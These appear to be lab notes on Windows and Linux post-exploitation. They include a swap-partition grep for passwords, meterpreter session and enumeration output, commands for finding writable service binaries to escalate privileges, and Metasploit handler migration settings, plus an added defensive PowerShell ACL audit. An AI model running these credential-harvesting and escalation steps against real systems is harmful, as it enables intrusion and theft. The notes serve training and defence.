MimiPenguin
cat /proc/swaps
strings /dev/sda5 | grep "&password="
meterpreter > sysinfo
Computer : ELS-WIN7
OS : Windows 7 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 172.50.50.20:4450...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331/ELS-WIN7_20160516.4331.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331
[*] Checking if ELS-WIN7 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Enabled
[*] Running Command List ...
[*] running command netstat -vb
meterpreter > run
Windows Post Gather Modules | Offensive Security
Linux Post Gather Modules | Offensive Security
Windows Post Manage Modules | Offensive Security
net start
wmic service list brief
C:\Users\els>wmic service > serv_list.txt
Look for services where the user is "having write privileges on the path where the target service binary is stored".
icacls C:\windows\system32
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name
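A defender's audit of the same condition, as an added PowerShell example that is not part of the original notes: it lists services whose binary sits outside System32 and whose binary file grants write or modify rights to low-privileged principals. The principal list and the rights mask are my assumptions; run it elevated on the host being hardened.

```powershell
# Audit: services with a binary outside %SystemRoot%\System32 whose file ACL
# lets low-privileged principals write to it (assumed principal list below).
$LowPriv = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE')
$R = [System.Security.AccessControl.FileSystemRights]
$WriteMask = [int]($R::Write -bor $R::Modify -bor $R::FullControl -bor
                   $R::WriteData -bor $R::AppendData)

function Get-ServiceBinaryPath {
    # Extract the executable from a service PathName, handling both
    # "C:\Program Files\x.exe" -arg (quoted) and C:\x.exe -arg (unquoted).
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) }
    }
    # Unquoted: take everything up to and including the first ".exe" token.
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split '\s+')[0]
}

$system32 = Join-Path $env:SystemRoot 'System32'
Get-CimInstance Win32_Service | ForEach-Object {
    $svc = $_
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not $bin) { return }
    if ($bin.StartsWith($system32, 'OrdinalIgnoreCase')) { return }
    if (-not (Test-Path -LiteralPath $bin)) { return }
    $acl = Get-Acl -LiteralPath $bin
    # Only Allow ACEs for low-privileged identities carrying write-type bits.
    $weak = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($LowPriv -contains $_.IdentityReference.Value) -and
        (([int]$_.FileSystemRights -band $WriteMask) -ne 0)
    }
    if ($weak) {
        [pscustomobject]@{
            Service    = $svc.Name
            RunsAs     = $svc.StartName
            Binary     = $bin
            WritableBy = ($weak.IdentityReference.Value | Sort-Object -Unique) -join ', '
        }
    }
} | Format-Table -AutoSize
```

Any row returned is a finding to remediate: tighten the file ACL (or move the binary under a protected directory) and, for unquoted paths with spaces, quote the ImagePath.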
msf exploit(handler) > set AutoRunScript explorer.exe
msf exploit(handler) > set AutoRunScript migrate -f